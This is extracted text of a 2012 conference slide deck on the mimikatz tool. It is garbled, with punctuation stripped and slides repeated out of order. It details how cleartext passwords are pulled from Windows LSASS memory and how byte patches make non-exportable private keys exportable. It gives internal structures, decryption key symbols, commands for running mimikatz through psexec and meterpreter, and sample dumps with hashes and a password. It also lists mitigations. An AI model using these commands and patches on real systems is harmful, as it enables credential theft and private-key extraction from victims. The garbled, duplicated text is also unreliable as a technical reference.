ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz sekurlsa wdigestwhat is it
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 18
mimikatz sekurlsa wdigesttheory
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digestndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemoryndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLEndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemoryndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLEndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in argsbull Protect it with LsaProtectMemorybull Update or insert data in double linked list wdigestl_LogSessList
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 19
text7409D151 _DigestCalcHA18 call dword ptr [eax+0B4h]
text74096C69 _SpAcceptCredentials16 call dword ptr [eax+0B0h]
mimikatz sekurlsa wdigestworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 20
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
typedef struct _KIWI_WDIGEST_LIST_ENTRY struct _KIWI_WDIGEST_LIST_ENTRY Flinkstruct _KIWI_WDIGEST_LIST_ENTRY BlinkDWORD UsageCountstruct _KIWI_WDIGEST_LIST_ENTRY ThisLUID LocallyUniqueIdentifier[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password[hellip]
KIWI_WDIGEST_LIST_ENTRY PKIWI_WDIGEST_LIST_ENTRY
wdigestl_LogSessList
search linked list for LUID
KIWI_WDIGEST_LIST_ENTRY
password in clear
mimikatz sekurlsa wdigestdemo time
sekurlsawdigest
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 21
mimikatz sekurlsa livessp
because Microsoft was too good in closed networks
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 22
mimikatz sekurlsa livessphow
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 23
0 kdgt process 0 0 lsassexePROCESS 83569040 SessionId 0 Cid 0224 Peb 7f43f000 ParentCid 01b4
DirBase 5df58100 ObjectTable 80ce4740 HandleCount ltData Not AccessiblegtImage lsassexe
0 kdgt process i 83569040You need to continue execution (press g ltentergt) for the contextto be switched When the debugger breaks in again you will be inthe new process context0 kdgt gBreak instruction exception - code 80000003 (first chance)ntRtlpBreakWithStatusInstruction814b39d0 cc int 30 kdgt reload userLoading User Symbols0 kdgt bp p $proc lsasrvLsaProtectMemory kc 5 g0 kdgt g
mimikatz sekurlsa livessphow
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 24
lsasrvLsaProtectMemorylivesspLiveMakeSupplementalCredlivesspLiveMakeSecPkgCredentialslivesspLsaApLogonUserEx2livesspSpiLogonUserEx2
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
1 kdgt uf c livesspLsaApLogonUserEx2livesspLsaApLogonUserEx2 (74781536)[]livesspLsaApLogonUserEx2+0x560 (74781a96)call to livesspLiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah Pass the Hash capability with Live account toohellip
Live user can logon through RDP via SSO
mimikatz sekurlsa livesspworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 25
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_LIVESSP_LIST_ENTRY struct _KIWI_LIVESSP_LIST_ENTRY Flinkstruct _KIWI_LIVESSP_LIST_ENTRY BlinkPVOID unk0PVOID unk1PVOID unk2PVOID unk3DWORD unk4DWORD unk5PVOID unk6LUID LocallyUniqueIdentifierLSA_UNICODE_STRING UserNamePVOID unk7PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds
KIWI_LIVESSP_LIST_ENTRY PKIWI_LIVESSP_LIST_ENTRY
livesspLiveGlobalLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LIST_ENTRYKIWI_LIVESSP_PRIMARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL DWORD isSuppDWORD unk0LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_LIVESSP_PRIMARY_CREDENTIAL PKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26
Me yes
mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27
lsasrvLsaProtectMemorykerberosKerbHideKeykerberosKerbCreatePrimaryCredentialskerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorykerberosKerbHidePasswordkerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorywdigestSpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL
DWORD unk0PVOID unk1PVOID unk2PVOID unk3
ifdef _M_X64BYTE unk4[32]
elif defined _M_IX86BYTE unk4[20]
endifLUID LocallyUniqueIdentifier
ifdef _M_X64BYTE unk5[44]
elif defined _M_IX86BYTE unk5[36]
endifLSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flinkstruct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCountPVOID unk0PVOID unk1PVOID unk2DWORD unk3DWORD unk4PVOID unk5PVOID unk6PVOID unk7LUID LocallyUniqueIdentifier
ifdef _M_IX86DWORD unk8
endifDWORD unk9DWORD unk10PVOID unk11DWORD unk12DWORD unk13PVOID unk14PVOID unk15PVOID unk16[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsademo time
Final sekurlsa demo sekurlsalogonPasswords full
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30
mimikatz sekurlsa kerberosldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31
mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32
LsaUnprotectMemory
mimikatz sekurlsaLsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKeyBYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsasrv
lsass
lsasrv
mimikatz
lsasrv
copyhellip
mimikatz sekurlsaLsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34
InitializationVector BYTE[16]
lsass
lsasrv
lsass
lsasrv
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD sizeDWORD tagDWORD typeDWORD unk0DWORD unk1DWORD unk2DWORD unk3PVOID unk4BYTE data etc
KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv typedef struct _KIWI_BCRYPT_KEY
DWORD sizeDWORD typePVOID unk0PKIWI_BCRYPT_KEY_DATA clePVOID unk1
KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsamemo
Security Packages
Protection Keys
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionListlsasrvLogonSessionListCount
LIST_ENTRYULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKeylsasrvg_pRandomKey
DESx lsasrvg_pDESXKeylsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsamemo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz
mimikatz privilegedebugDemande dACTIVATION du privilegravege SeDebugPrivilege OK
mimikatz sekurlsalogonPasswords full
Authentification Id 0234870Package dauthentification NTLMUtilisateur principal Gentil KiwiDomaine dauthentification vm-w8-rp-x
msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a
kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
livessp nt (LUID KO)
mimikatz sekurlsawhat we can do
Basicsndash No physical access to computer (first step to pass the hash then pass the pass)ndash No admin rights system rights debug privileges (hellip)ndash Disable local admin accountsndash Strong passwords (haha it was a joke so useless )ndash For privileged account network login instead of interactive (when possible)ndash Audit pass the hash keeps traces and can lock accountsndash No admin rights system rights debug privileges even VIPndash Use separated network (or forest) for privileged tasks
More in depthndash Force strong authentication (SmartCard amp Token) $ eurondash Short validity for Kerberos ticketsndash No delegationndash Disable NTLM (available with NT6)ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows)bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys ))ndash Let opportunities to stop retro compatibilityndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37
mimikatz cryptowhat is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeysbull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Exportbull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patchbull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38
mod_mimikatz_crypto
mimikatz cryptohow itrsquos protected
Private keys are DPAPI protectedndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened)ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39
Constraint for most userUnavailable for computer keys
certutil -importpfx mycertp12 NoExportcertutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capihow it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquondash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellipndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40
mimikatz crypto capihow itrsquos exported ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapibecause I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42
mimikatz cryptoexportCertificatesEmplacement CERT_SYSTEM_STORE_CURRENT_USERMy
- Benjamin DelpyContainer Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03Provider Microsoft Enhanced Cryptographic Provider v10Type AT_KEYEXCHANGEExportabiliteacute NONTaille cleacute 2048Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO
(0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacuteExport public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BEObjet CN=Benjamin Delpy C=FRIl ne sagit pas dun certificat racineHach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03Fournisseur = Microsoft Enhanced Cryptographic Provider v10
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de cryptageCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapibecause I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapidemo time
Import export import as not exportablehellip export
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz sekurlsa wdigesttheory
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digestndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemoryndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLEndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemoryndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLEndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in argsbull Protect it with LsaProtectMemorybull Update or insert data in double linked list wdigestl_LogSessList
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 19
text7409D151 _DigestCalcHA18 call dword ptr [eax+0B4h]
text74096C69 _SpAcceptCredentials16 call dword ptr [eax+0B0h]
mimikatz sekurlsa wdigestworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 20
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
typedef struct _KIWI_WDIGEST_LIST_ENTRY struct _KIWI_WDIGEST_LIST_ENTRY Flinkstruct _KIWI_WDIGEST_LIST_ENTRY BlinkDWORD UsageCountstruct _KIWI_WDIGEST_LIST_ENTRY ThisLUID LocallyUniqueIdentifier[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password[hellip]
KIWI_WDIGEST_LIST_ENTRY PKIWI_WDIGEST_LIST_ENTRY
wdigestl_LogSessList
search linked list for LUID
KIWI_WDIGEST_LIST_ENTRY
password in clear
mimikatz sekurlsa wdigestdemo time
sekurlsawdigest
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 21
mimikatz sekurlsa livessp
because Microsoft was too good in closed networks
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 22
mimikatz sekurlsa livessphow
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 23
0 kdgt process 0 0 lsassexePROCESS 83569040 SessionId 0 Cid 0224 Peb 7f43f000 ParentCid 01b4
DirBase 5df58100 ObjectTable 80ce4740 HandleCount ltData Not AccessiblegtImage lsassexe
0 kdgt process i 83569040You need to continue execution (press g ltentergt) for the contextto be switched When the debugger breaks in again you will be inthe new process context0 kdgt gBreak instruction exception - code 80000003 (first chance)ntRtlpBreakWithStatusInstruction814b39d0 cc int 30 kdgt reload userLoading User Symbols0 kdgt bp p $proc lsasrvLsaProtectMemory kc 5 g0 kdgt g
mimikatz sekurlsa livessphow
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 24
